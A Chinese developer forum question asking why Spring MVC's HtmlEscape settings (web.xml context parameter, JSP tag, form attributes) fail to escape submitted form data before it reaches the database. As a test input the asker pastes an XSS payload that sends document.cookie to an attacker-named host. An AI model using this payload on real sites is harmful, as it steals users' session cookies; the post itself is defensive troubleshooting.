问答博客资讯标签用户活动
logo极客观点logo项目管理logoHarmonyOS
开发者社区
javascript
前端
python
node.js
react
vue.js
php
laravel
go
人工智能
mysql
linux
ios
java
android
css
typescript
spring
程序员
logoONES 研发管理logo思否企业问答logo安谋科技 XPU

SpringMVC: HtmlEscape 设置没起作用怎么回事?

头像
扬子将庞
    2025

    项目用的是 SpringMVC+jsp

    想要对提交表格的内容进行字符转义防止 XSS 攻击

    根据 http://www.codeweblog.com/spr...

    做处理,下面三条都做了

    1)web.xml 中添加

     <context-param>     <param-name>defaultHtmlEscape</param-name>      <param-value>true</param-value> </context-param>

    2)在包含 form 的 jsp 页面中添加

     <spring:htmlEscape defaultHtmlEscape="true" />

    3 )直接在 form 中的元素中添加

     <form:input path="someFormField" htmlEscape="true" />或<form:form htmlEscape="true">

    然后在表格上添加

    <script>document.getElementById('attacker').href='http://www.attacker_741.com/r...'+document.cookie;</script>

    发现存进数据库的没有转移,依然是原文

    怎么回事啊?

    spring-mvcjava安全springweb
    阅读 5.9k
    1 个回答
    得票最新
    查看全部 1 个回答
    推荐问题